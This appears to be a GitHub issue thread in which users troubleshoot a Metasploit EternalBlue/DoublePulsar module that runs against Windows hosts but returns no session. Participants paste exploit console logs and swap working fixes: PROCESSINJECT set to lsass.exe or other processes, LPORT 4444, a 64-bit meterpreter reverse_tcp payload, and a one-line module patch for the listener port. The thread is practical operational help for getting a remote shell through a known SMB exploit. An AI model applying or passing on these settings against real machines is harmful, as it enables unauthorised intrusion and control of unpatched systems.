Attack success does not return shell

[smile0304]

Hello the developer: How should i solve it? [] Started reverse TCP handler on 192.168.12.110:8888 [] 192.168.12.106:445 - Generating Eternalblue XML data [] 192.168.12.106:445 - Generating Doublepulsar XML data [] 192.168.12.106:445 - Generating payload DLL for Doublepulsar [] 192.168.12.106:445 - Writing DLL in /root/8888.dll [] 192.168.12.106:445 - Launching Eternalblue... [+] 192.168.12.106:445 - Backdoor is already installed [] 192.168.12.106:445 - Launching Doublepulsar... [+] 192.168.12.106:445 - Remote code executed... 3... 2... 1... [] Exploit completed, but no session was created.

[UrielRicardo]

@smile0304 See if your port for TCP is allowed on the network, in my case it was not! In case your 8888

If you do not know use your internet 4g

[msdnteam]

Change: PROCESSINJECT wlms.exe/lsass.exe or other

[ingjieye]

i have the same issue , did you sloved it yet?

[ingjieye]

Hi, i just solved the problem. I change the PROCESSINJECT to lsass.exe then i get the shell. Though my target is running win7 x86 and it says "Change to lsass.exe for x64".

[smile0304]

Listening port can not be modified, use the default 4444 port try, I tested two days to find this problem

[RubyistCTRLDYT]

Change the processinject to svchost. exe for win7 x86

[LeionTong]

You can also use explorer.exe as the processinject for win7 x86

[LukaSikic]

None of these worked for me.. svchost.exe gave me BSOD and restarted haha.. still doesn't work in Win 7 x86

[sithis993]

I managed to solve this issue, and it may work for you guys too. I tried all of these steps but still received the error "Exploit completed but no session was created".

If you're exploiting a 64 bit machine, make sure that you set the payload to a 64 bit meterpreter payload. In my case I used:

_set payload windows/x64/meterpreter/reversetcp

As soon as I made this change, I got a meterpreter shell! In the image below, you can see the original error, the exact change I made, and then the resulting success:

[LukaSikic]

I also managed to solve it by using port 4444 and changing PROCESSINJECT to lsass.exe (even if target machine is x86).. 👍

[ant0n1o]

For x64 machines LPORT=4444, Payload set to windows/x64/meterpreter/reverse_tcp or https. I realized my firewall was restricting communication on any other port other than 4444, 443 and 80

[slonkak]

I'm in the same but slightly different boat. I'm attacking a 2008r2 x64 host from an x86 kali host. I tried all of the suggestions in this and numerous other threads but I get the exact same output as the OP. It looks like it works but I never get a shell back. Do I need to switch to 64-bit kali so wine can make a 64 bit dll? Or does anyone know what's going wrong?

[slonkak]

Update: I downloaded the 64 bit kali and it still doesn't work.

[H8to]

I wonder why this will not work for other ports than 4444. I tried several systems with PROCESSINJECT lsass.exe (including x86) but the payload only succeeds if one chooses the port 4444. Any idea which could be the root cause for this? Other people here have the same issue it seems. No firewall between.

Thanks

[LukaSikic]

@H8to I think developers like port 4444 so much that they hard-coded it somewhere or they just like when we bash our keyboards.

[H8to]

Yeah I looked for it but it seem at least in the xml config files there is no sign of it. Or do you mean by the original developers? :D I wonder why a spy software would use ports other than 443 or 80 :confused:

If I think about it.. DoublePulsar is only taking care of the dll injection. There should be no issues with generating a reverse shell payload with ports other than 4444 as this is done by Metasploit.

Update: After line 96 add pay.datastore['LPORT'] = datastore['LPORT']

I did not test this yet, as I don't have a VM with me, but it might do the trick.

[ghost]

run

[] Started reverse TCP handler on 192.168.244.133:4444 [] 172.16.2.222:3269 - Generating Eternalblue XML data [] 172.16.2.222:3269 - Generating Doublepulsar XML data [] 172.16.2.222:3269 - Generating payload DLL for Doublepulsar [] 172.16.2.222:3269 - Writing DLL in /root/.wine/drive_c/eternal11.dlleternal11.dll [] 172.16.2.222:3269 - Launching Eternalblue... [-] Error getting output back from Core; aborting... [-] 172.16.2.222:3269 - Are you sure it's vulnerable? [] 172.16.2.222:3269 - Launching Doublepulsar... [-] 172.16.2.222:3269 - Oops, something was wrong! [] Exploit completed, but no session was created.

same error any solutions

[pzohner]

Could someone please explain how to change the PROCESSINJECT to lsass.exe? I don't see that in the "show options"

[X0R1972]

guy's is this still working ?? because i read in many forums and on securityonline website that it is fixed by microsoft patch and no working anymore

[UrielRicardo]

@pzohner set PROCESSINJECT lsass.exe

[UrielRicardo]

@mateo24xx Actually, if the machine has already been updated, it has received the updates of the ms17-010 bulletin this attack will not work

[bucky67gto]

@H8to did you ever test using another port ie.

After line 96 add pay.datastore['LPORT'] = datastore['LPORT']

[elfnight0]

only disable firewall modem or restart modem

fix ?